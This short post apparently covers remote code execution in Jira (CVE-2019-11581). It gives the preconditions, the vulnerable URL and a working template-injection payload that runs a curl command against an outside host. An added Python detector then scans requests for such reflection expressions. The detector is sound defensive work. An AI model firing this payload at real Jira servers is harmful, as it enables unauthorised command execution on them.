RCE in Jira (CVE-2019-11581)

  1. Such functionality was turned on. It is turned off by default.
  2. Jira is not protected by an ACL, firewall or SSO provider that prevents unauthenticated access.
https://jiraserver/secure/ContactAdministrators!default.jspa
$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl http://avtohanter.ru/rcetest?a=a').waitFor()
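
A defender-side check for the request shown above, as an added example (not code from the original post): it scans captured requests to the contact-administrators form for Velocity references that call Java reflection methods, as the payload on this page does. The capture format, the form field names and the POST path are assumptions, and the sample requests are constructed.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Path from the page; also matches other actions of the same form
# (e.g. ContactAdministrators.jspa, assumed here as the POST target).
ENDPOINT = re.compile(r"^/secure/ContactAdministrators(?:![A-Za-z]+)?\.jspa$", re.I)

# A Velocity reference ($name or ${name}) that goes on to call a Java
# reflection or process-execution method, as the page's payload does.
REFLECTION = re.compile(
    r"\$!?\{?[A-Za-z_]\w*\S*?\.(getClass|forName|getMethod|invoke|exec)\s*\(")

def flag_request(method, url, body=""):
    """Return [(field, matched_method), ...]; empty if nothing suspicious."""
    parts = urlsplit(url)
    if not ENDPOINT.match(parts.path):
        return []
    # parse_qsl percent-decodes, so encoded payloads are matched too.
    fields = parse_qsl(parts.query, keep_blank_values=True)
    if method.upper() == "POST":
        fields += parse_qsl(body, keep_blank_values=True)
    hits = []
    for name, value in fields:
        match = REFLECTION.search(value)
        if match:
            hits.append((name, match.group(1)))
    return hits

# Constructed sample requests (method, URL, form body); field names are assumptions.
SAMPLES = [
    ("GET", "/secure/ContactAdministrators!default.jspa", ""),
    ("POST", "/secure/ContactAdministrators.jspa",
     "subject=Password+reset&details=Invoice+%24amount+is+wrong"),
    ("POST", "/secure/ContactAdministrators.jspa",
     "subject=%24i18n.getClass%28%29.forName%28%27java.lang.Runtime%27%29&details=x"),
    ("POST", "/secure/Dashboard.jspa", "q=%24i18n.getClass%28%29"),
]

def scan(samples):
    """Return (index, hits) for every sample request that was flagged."""
    return [(i, hits) for i, s in enumerate(samples) if (hits := flag_request(*s))]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLES):
        print(f"request {idx}: template expression with reflection in {hits}")
```
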

ruvlol